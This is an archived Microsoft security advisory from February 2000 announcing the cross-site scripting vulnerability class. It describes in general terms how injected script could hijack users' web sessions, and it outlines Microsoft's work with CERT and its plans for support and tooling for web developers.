Information on Cross-Site Scripting Security Vulnerability

Archived content. No warranty is made as to technical accuracy. Content may contain URLs that were valid when originally published, but now link to sites or pages that no longer exist.

Originally Posted: February 02, 2000

Microsoft has identified a serious security vulnerability that could potentially affect many web sites and web site users. The vulnerability, known as "Cross-Site Scripting", is equally possible on all vendors' products, and does not result from a defect in any of them. Instead, it results from certain common web coding practices. Microsoft is working with the CERT Coordination Center and other industry leaders to provide information about this issue to customers.

Cross-Site Scripting would potentially enable a malicious user to introduce executable code of his choice into another user's web session. Once the code was running, it could take a wide range of actions, from monitoring the user's web session and forwarding a copy to the malicious user, to changing what's displayed on the user's screen. Even more seriously, the script could make itself persistent, so that the next time the user returned to the web site, the malicious user's script would start running again.

The long-term solution to the problem requires web sites and web site developers to review their code and verify that it adheres to secure coding practices. However, in the short term, there are some steps that customers can take to minimize the likelihood of being affected by this issue. The FAQ discusses these in detail.

Microsoft is working with the CERT and other industry leaders to alert customers of all affected communities - web site operators, web developers, and web users - to the issue, galvanize web sites into making these changes expeditiously, provide technical information for web sites and web site developers, and let customers know what they can do to protect themselves in the meantime. Additional information on the issue can be found at:

In addition, Microsoft Technical Support is offering comprehensive support to web sites and web developers who need help in reviewing their code and making the needed changes:

  • Microsoft Technical Support and Microsoft Consulting Services have established a Support Team focused on this issue.

  • Microsoft Technical Support will provide round-table discussions to help customers who need additional technical information on the issue. More information will be available soon

  • Microsoft is developing a set of tools that will assist web developers in doing the filtering. These tools are under development, and we will make them available as soon as possible.

Revisions

  • Created February 02, 2000